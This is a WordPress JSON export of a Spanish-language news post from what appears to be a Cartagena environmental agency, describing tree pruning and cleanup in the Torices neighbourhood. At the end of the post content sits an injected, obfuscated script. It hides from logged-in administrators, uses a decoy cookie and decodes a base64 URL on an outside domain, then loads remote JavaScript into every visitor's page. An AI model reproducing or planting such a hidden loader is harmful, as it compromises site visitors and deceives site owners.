{"id":29945,"date":"2025-09-02T16:45:17","date_gmt":"2025-09-02T21:45:17","guid":{"rendered":"https:\/\/epacartagena.gov.co\/web\/?p=29945"},"modified":"2025-10-28T23:39:07","modified_gmt":"2025-10-29T04:39:07","slug":"jornada-de-recuperacion-en-el-barrio-torices","status":"publish","type":"post","link":"https:\/\/epacartagena.gov.co\/web\/jornada-de-recuperacion-en-el-barrio-torices\/","title":{"rendered":"Jornada de Recuperaci\u00f3n en el barrio Torices"},"content":{"rendered":"\n<p>Desplegamos la jornada integral en este sector de la ciudad, con el prop\u00f3sito de iniciar la recuperaci\u00f3n del entorno.<\/p>\n\n\n\n<p>La primera intervenci\u00f3n en la carrera 14 del barrio Torices, incluy\u00f3 la poda de \u00e1rboles y el control de planta par\u00e1sita de \u00e1rboles.<\/p>\n\n\n\n<p>Adem\u00e1s, en articulaci\u00f3n con Pacaribe, se realiz\u00f3 limpieza y adecuaci\u00f3n en los puntos cr\u00edticos del sector para liberar el espacio p\u00fablico de desechos.<\/p>\n\n\n\n<p>As\u00ed mismo se hizo visita puerta a puerta en viviendas y negocios, con el prop\u00f3sito de promover buenas pr\u00e1cticas de cuidado ambiental entre los residentes y empresas del sector.<\/p>\n\n\n\n<p>Posteriormente se sembraran \u00e1rboles florales y maderables para fortalecer la cobertura vegetal a lo largo de esta importante v\u00eda de la ciudad.<\/p>\n\n\n\n<p>Unidos avanzamos a la transformaci\u00f3n de nuestra ciudad.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-9-16 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Jornada de Recuperaci\u00f3n en el barrio Torices\" width=\"563\" height=\"1000\" src=\"https:\/\/www.youtube.com\/embed\/1X3-mnMVFGY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n<style>.wp-block-kadence-advancedgallery .kb-gallery-type-grid.kb-gallery-id-29945_aabb02-db{margin:-5px;}.kb-gallery-type-grid.kb-gallery-id-29945_aabb02-db .kadence-blocks-gallery-item{padding:5px;}.kb-gallery-id-29945_aabb02-db .kadence-blocks-gallery-item .kb-gal-image-radius, .kb-gallery-id-29945_aabb02-db .kb-slide-item .kb-gal-image-radius img{border-radius:0px 0px 0px 0px;;}<\/style><div class=\"kb-gallery-wrap-id-29945_aabb02-db alignnone wp-block-kadence-advancedgallery\"><ul class=\"kb-gallery-ul kb-gallery-non-static kb-gallery-type-grid kb-gallery-id-29945_aabb02-db kb-gallery-caption-style-bottom-hover kb-gallery-filter-none kb-gallery-magnific-init\" data-image-filter=\"none\" data-item-selector=\".kadence-blocks-gallery-item\" data-lightbox-caption=\"true\" data-columns-xxl=\"3\" data-columns-xl=\"3\" data-columns-md=\"3\" data-columns-sm=\"2\" data-columns-xs=\"1\" data-columns-ss=\"1\"><li class=\"kadence-blocks-gallery-item\"><div class=\"kadence-blocks-gallery-item-inner\"><figure class=\"kb-gallery-figure kb-gallery-item-has-link kadence-blocks-gallery-item-hide-caption\"><a href=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-rotated.jpg\" class=\"kb-gallery-item-link\"   role=\"button\" aria-haspopup=\"dialog\"><div class=\"kb-gal-image-radius\"><div class=\"kb-gallery-image-contain kadence-blocks-gallery-intrinsic kb-gallery-image-ratio-land32 kb-has-image-ratio-land32\" ><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-683x1024.jpg\" width=\"683\" height=\"1024\" alt=\"\" data-full-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-rotated.jpg\" data-light-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-rotated.jpg\" data-id=\"29948\" class=\"wp-image-29948\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-683x1024.jpg 683w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-200x300.jpg 200w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-768x1152.jpg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-1024x1536.jpg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-500x750.jpg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-800x1200.jpg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0086-rotated.jpg 1080w\" sizes=\"auto, (max-width: 683px) 100vw, 683px\" \/><\/div><\/div><\/a><\/figure><\/div><\/li><li class=\"kadence-blocks-gallery-item\"><div class=\"kadence-blocks-gallery-item-inner\"><figure class=\"kb-gallery-figure kb-gallery-item-has-link kadence-blocks-gallery-item-hide-caption\"><a href=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2.jpeg\" class=\"kb-gallery-item-link\"   role=\"button\" aria-haspopup=\"dialog\"><div class=\"kb-gal-image-radius\"><div class=\"kb-gallery-image-contain kadence-blocks-gallery-intrinsic kb-gallery-image-ratio-land32 kb-has-image-ratio-land32\" ><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2-682x1024.jpeg\" width=\"682\" height=\"1024\" alt=\"\" data-full-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2.jpeg\" data-light-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2.jpeg\" data-id=\"29951\" class=\"wp-image-29951\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2-682x1024.jpeg 682w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2-200x300.jpeg 200w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2-768x1152.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2-500x750.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2-800x1200.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-2.jpeg 853w\" sizes=\"auto, (max-width: 682px) 100vw, 682px\" \/><\/div><\/div><\/a><\/figure><\/div><\/li><li class=\"kadence-blocks-gallery-item\"><div class=\"kadence-blocks-gallery-item-inner\"><figure class=\"kb-gallery-figure kb-gallery-item-has-link kadence-blocks-gallery-item-hide-caption\"><a href=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148.jpg\" class=\"kb-gallery-item-link\"   role=\"button\" aria-haspopup=\"dialog\"><div class=\"kb-gal-image-radius\"><div class=\"kb-gallery-image-contain kadence-blocks-gallery-intrinsic kb-gallery-image-ratio-land32 kb-has-image-ratio-land32\" ><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148-1024x683.jpg\" width=\"1024\" height=\"683\" alt=\"\" data-full-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148.jpg\" data-light-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148.jpg\" data-id=\"29947\" class=\"wp-image-29947\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148-1024x683.jpg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148-300x200.jpg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148-768x512.jpg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148-1536x1024.jpg 1536w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148-500x333.jpg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148-800x533.jpg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148-1280x853.jpg 1280w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/ADG_0148.jpg 1620w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/div><\/a><\/figure><\/div><\/li><li class=\"kadence-blocks-gallery-item\"><div class=\"kadence-blocks-gallery-item-inner\"><figure class=\"kb-gallery-figure kb-gallery-item-has-link kadence-blocks-gallery-item-hide-caption\"><a href=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3.jpeg\" class=\"kb-gallery-item-link\"   role=\"button\" aria-haspopup=\"dialog\"><div class=\"kb-gal-image-radius\"><div class=\"kb-gallery-image-contain kadence-blocks-gallery-intrinsic kb-gallery-image-ratio-land32 kb-has-image-ratio-land32\" ><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3-1024x682.jpeg\" width=\"1024\" height=\"682\" alt=\"\" data-full-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3.jpeg\" data-light-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3.jpeg\" data-id=\"29952\" class=\"wp-image-29952\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3-1024x682.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3-300x200.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3-768x512.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3-500x333.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3-800x533.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-3.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/div><\/a><\/figure><\/div><\/li><li class=\"kadence-blocks-gallery-item\"><div class=\"kadence-blocks-gallery-item-inner\"><figure class=\"kb-gallery-figure kb-gallery-item-has-link kadence-blocks-gallery-item-hide-caption\"><a href=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1.jpeg\" class=\"kb-gallery-item-link\"   role=\"button\" aria-haspopup=\"dialog\"><div class=\"kb-gal-image-radius\"><div class=\"kb-gallery-image-contain kadence-blocks-gallery-intrinsic kb-gallery-image-ratio-land32 kb-has-image-ratio-land32\" ><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1-1024x682.jpeg\" width=\"1024\" height=\"682\" alt=\"\" data-full-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1.jpeg\" data-light-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1.jpeg\" data-id=\"29950\" class=\"wp-image-29950\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1-1024x682.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1-300x200.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1-768x512.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1-500x333.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1-800x533.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/div><\/a><\/figure><\/div><\/li><li class=\"kadence-blocks-gallery-item\"><div class=\"kadence-blocks-gallery-item-inner\"><figure class=\"kb-gallery-figure kb-gallery-item-has-link kadence-blocks-gallery-item-hide-caption\"><a href=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM.jpeg\" class=\"kb-gallery-item-link\"   role=\"button\" aria-haspopup=\"dialog\"><div class=\"kb-gal-image-radius\"><div class=\"kb-gallery-image-contain kadence-blocks-gallery-intrinsic kb-gallery-image-ratio-land32 kb-has-image-ratio-land32\" ><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1024x682.jpeg\" width=\"1024\" height=\"682\" alt=\"\" data-full-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM.jpeg\" data-light-image=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM.jpeg\" data-id=\"29949\" class=\"wp-image-29949\" srcset=\"https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-1024x682.jpeg 1024w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-300x200.jpeg 300w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-768x512.jpeg 768w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-500x333.jpeg 500w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM-800x533.jpeg 800w, https:\/\/epacartagena.gov.co\/web\/wp-content\/uploads\/2025\/09\/WhatsApp-Image-2025-09-02-at-4.14.37-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/div><\/a><\/figure><\/div><\/li><\/ul><\/div><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Desplegamos la jornada integral en este sector de la ciudad, con el prop\u00f3sito de iniciar la recuperaci\u00f3n del entorno. La primera intervenci\u00f3n en la carrera 14 del barrio Torices, incluy\u00f3 la poda de \u00e1rboles y el control de planta par\u00e1sita de \u00e1rboles. Adem\u00e1s, en articulaci\u00f3n con Pacaribe, se realiz\u00f3 limpieza y adecuaci\u00f3n en los puntos&#8230;<\/p>\n","protected":false},"author":1,"featured_media":29946,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"_kad_post_classname":"","_vp_format_video_url":"","_vp_image_focal_point":[],"footnotes":""},"categories":[16,7],"tags":[],"class_list":["post-29945","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-areas-degradadas","category-noticias"],"acf":[],"_links":{"self":[{"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/posts\/29945","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/comments?post=29945"}],"version-history":[{"count":2,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/posts\/29945\/revisions"}],"predecessor-version":[{"id":31746,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/posts\/29945\/revisions\/31746"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/media\/29946"}],"wp:attachment":[{"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/media?parent=29945"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/categories?post=29945"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/epacartagena.gov.co\/web\/wp-json\/wp\/v2\/tags?post=29945"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}